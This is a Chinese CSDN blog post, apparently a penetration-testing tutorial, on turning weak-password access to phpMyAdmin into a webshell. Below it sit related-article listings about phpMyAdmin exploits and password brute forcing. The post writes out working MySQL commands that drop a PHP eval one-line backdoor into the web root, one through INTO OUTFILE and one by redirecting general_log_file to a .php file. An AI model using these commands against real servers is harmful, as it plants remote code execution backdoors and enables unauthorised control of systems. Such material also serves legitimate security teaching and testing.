【Web安全】拿到phpMyAdmin如何获取权限

最新推荐文章于 2024-08-28 13:11:09 发布
最新推荐文章于 2024-08-28 13:11:09 发布
阅读量663 收藏 9
点赞数 8
分类专栏: # Web安全 文章标签: web安全 android 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/134695378
版权

文章目录


通过弱口令拿到进到phpMyAdmin页面如何才能获取权限

1、outfile写一句话

尝试执行outfile语句写入一句话木马

select "<?php @eval($_REQUEST[6868])?>"  into outfile "C:\\phpStudy\\WWW\\phpadmin.php";

image-20231023210312344

image-20231023210353375

如果执行失败show variables like "%secure%"; 查看配置

image-20231023210727393

2、general_log_file写一句话

查看general_log是否开启

通过show global variables like "%genera%";查看

image-20231023204626426

执行set global general_log="on";打开

通过generali_log_file写入一句话木马

set global general_log_file=“网站绝对路径/文件名”;

image-20231023204850257

SELECT "<?php @eval($_POST[1])?>"

image-20231023204934826

general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

image-20231023211035433

过期的秋刀鱼-
关注
专栏目录
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
phpMyadmin 用户权限中英对照
10-29
在登陆phpmyadmin时选择了“中文 – Chinese Simplified“,那么就有中文的管理界面了,虽然在phpmyadmin中显示的用户权限显示的还是英文的,但是鼠标放上去时,有中文的提示,这里把phpmyadmin v3.2.4中英文对照表附上
phpMyAdmin使用教程:[2]用户及权限管理
痞子51998
08-31 2286
1. 创建新用户 1 第1步:打开phpMyAdmin,点击菜单栏的【用户】按钮,进入用户管理页面。 2 第2步:用户管理页面列出了现有用户信息,点击【添加用户】创建新用户。 3 第3步:输入用户名【User name】。有两个选项:任意用户、使用文本域,它们之间没有明显区别,推
织梦CMS渗透测试:从弱口令到接管webshell
xt350488的博客
08-06 1315
关于交流群,后台添加即可401验证,在网络通信和HTTP协议中,特指一种状态码——401 Unauthorized(未经授权)。当客户端尝试访问受保护的资源时,如果未能提供有效的身份验证信息,或者提供的信息不足以获得访问权限,服务器就会返回401状态码,表示请求未被授权。
PHPMyAdmin权限配置
最新发布
YhMjQx的博客
08-28 808
本篇文章主要讲解PHPMyAdmin权限配置
phpmyadmin管理数据库时的权限问题
Mar.三月
04-17 2118
原因: 一:以空密码登录,实际上并不是以管理员的身份登陆的(我猜的,ruyou不对,wang指出),总之zhe种方式登录会缺少一些权限。导致当前用户无法操作phpmyadmin的绝大多数的功能, 解决方案: 1改权限:不好改啊,试了很多次,但是好像dang前user连更改权限的机会都没有,只好卸载重装,不知道怎么回事一切都正常了,用密码可以登录,且登录phpmyadmin时是以管理员的身份登录...
phpmyadmin 配置文件权限错误,无法写入!
wangxiaopeng0329的博客
11-05 2704
具体操作: cd /var/www (此目录为你的web发布根目录) chomd  -R 755 phpmyadmin  (此为目录,且权限必须跟改为755 ,改为 777 也是不行的!!)
Web安全期末复习
kaisaooo的博客
07-02 6353
目录前言知识点Web应用开发基础Web信息收集Web漏洞扫描SQL注入文件上传攻击跨站脚本攻击(XSS)跨站请求伪造命令执行漏洞Web Server配置安全认证和授权日志系统构建及日志分析实战与综合简答题复习要点ASP.NET的安全控件web应用系统的数据加密数据库安全通信身份验证日志分析安全配置一套习题 前言 本文用来记录Web安全的复习资料,大部分内容都是从老师ppt的复习范围中节选的,可能不太全,经过考试的心得:有时间的可以多看看,考的比较杂啥都有,但是SQL注入、XSS、文件上传漏洞是重中之重。有
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8011
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
WEB安全学习笔记
chenrs727的博客
12-02 1981
基础入门 1.基础入门——基础概念 域名 什么是域名 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置) 由于IP地址具有不方便记忆并且不能显示地址组织的名称和性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名和IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。 比如www.bai
Mysql注入中的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下 翻译一下就是 其中当参数 secure_file_priv 为空时,对导入导出无限制 当值为一个指定的目录时,只能向指定的目录导入导出 当值被设置为NULL时,禁止导
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 3万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
phpmyadmin弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1444
phpmyadmin弱口令至getshell 漏洞复现
45.网络安全渗透测试—[穷举篇8]—[phpMyAdmin登录弱口令穷举]
qwsn
01-12 4153
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、phpMyAdmin登录弱口令 1、两个工具: 2、示例:
PHPMyAdmin弱口令猜解【Python脚本】
12-07 2251
PHPMyAdmin弱口令猜解 测试截图:  代码片段 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import time username_list=['root'] password_list=['root','','admin','123456','password'] def phpMyAdm...
弱口令爆破-web类+服务类+应用类
xiaoheizi的博客
07-06 209
弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令,通常与管理的安全意识和平台的初始化配置等相关,通过系统弱口令,可被黑客直接获得系统控制权限。在常见的安全测试中,弱口令会产生安全的各个领域,包括Web应用,安全设备,平台组件,操作系统等;hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可。-t TASKS 同时运行的线程数,默认为16。
phpmyadmin权限
kzyyx的博客
08-31 789
标题phpmyadmin权限 挺垃圾的一个网站通过弱口令root进入后台。 最主要还能直接直行根目录下phpinfo查看网站绝对路径。 1.首先尝试执行outfile语句写入一句话木马 报错显示说是数据库正在运行–secure_file_priv选项,无法执行outfile这个语句。感觉在这个参数上做了限制。 这是secure_file_priv参数的说明。 2.执行show variables like “%secure%”; 查看配置 回显设置为NULL,没有做限制。暂时不知道原因,后续懂了做补
MYSQL安全防御:WEB安全防御简单方法
MYSQL安全防御-简单的WEB安全防御 MYSQL安全防御是指对MYSQL数据库的保护和防御,以防止黑客攻击和数据泄露。MYSQL安全防御包括多个方面,如密码安全、访问控制、数据加密、备份和恢复、日志记录和监控等。 首先,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值